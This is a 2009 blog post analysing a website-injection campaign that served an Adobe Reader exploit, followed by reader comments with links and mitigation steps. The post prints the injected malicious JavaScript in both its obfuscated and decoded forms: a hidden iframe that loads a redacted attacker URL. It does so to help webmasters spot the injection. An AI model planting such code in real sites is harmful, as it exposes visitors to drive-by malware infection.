Why you should get the latest version if you are using Acrobat Reader

April 6, 2009 on 10:08 am | In Malware analysis | 4 Comments

Since the 24th of February 2009 there is an exploit in the wild that affects all Adobe Reader versions 9.0 and earlier.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0658
Twice since then I have been contacted by site owners that found their sites spreading malware. One of them got infected by his own site.
The method that is in use is add a piece of Javascript to the code of the site. This Javascript points to an i-frame which in turn holds the exploit.
The javascript that gets added to the site usually just is an encrypted pointer like this:

document.write( unescape( '%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%78%78%78%78%78%78%78%78%78%78%2F%75%6E%69%71%75%65%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A' ) );

Which looks like this after parsing:


document.write('<iframe src="http://xxxxxxxxxxx/unique/index.php" width="0" height="0" style="display:none;"></iframe>');

Obviously I x-ed out the domain. It doesn’t matter for this one if you are using IE, Opera, FireFox or any other browser. If you have Acrobat Reader installed and it’s not the latest version, you’re vulnerable.

So, webmasters, check if your code is unchanged and readers, make sure to get the latest updates of everything you are using.

4 Comments »

RSS feed for comments on this post. TrackBack URI

  1. Or stop using it alltogether as suggested by Mikko Hypponen, chief research officer of security firm F-Secure. Read more here: http://www.cnet.com.au/stop-using-adobe-acrobat-reader-f-secure-chief-research-officer-339296076.htm

    Comment by metallica — April 25, 2009 #

  2. And to demonstrate his point:
    http://cyberinsecure.com/exploit-posted-for-adobe-reader-pdf-zero-day-vulnerability-in-getannots-javascript-function/

    Proof-of-concept exploit code has been published for a new zero-day vulnerability haunting Adobe’s widely deployed PDF Reader software.

    In a brief note posted to its PSIRT blog, Adobe confirmed it was investigating the issue, which affects Adobe Reader 9.1 and 8.1.4

    Comment by metallica — April 29, 2009 #

  3. And more: http://cyberinsecure.com/buffer-overflow-critical-vulnerabilities-in-adobe-reader-and-acrobat/
     

    In the meantime, to mitigate the issue disable JavaScript in Adobe Reader and Acrobat using the following instructions below:

    1. Launch Acrobat or Adobe Reader.
    2. Select Edit>Preferences
    3. Select the JavaScript Category
    4. Uncheck the ‘Enable Acrobat JavaScript’ option
    5. Click OK

    Adobe is currently not aware of any reports of exploits in the wild for these issues.

    Comment by metallica — May 6, 2009 #

  4. It’s official: Adobe Reader is world’s most-exploited app.

    http://www.theregister.co.uk/2010/03/09/adobe_reader_attacks/

    Comment by metallica — March 13, 2010 #

Leave a comment

XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Powered by WordPress with Pool theme design by Borja Fernandez.
Entries and comments feeds. Valid XHTML and CSS. ^Top^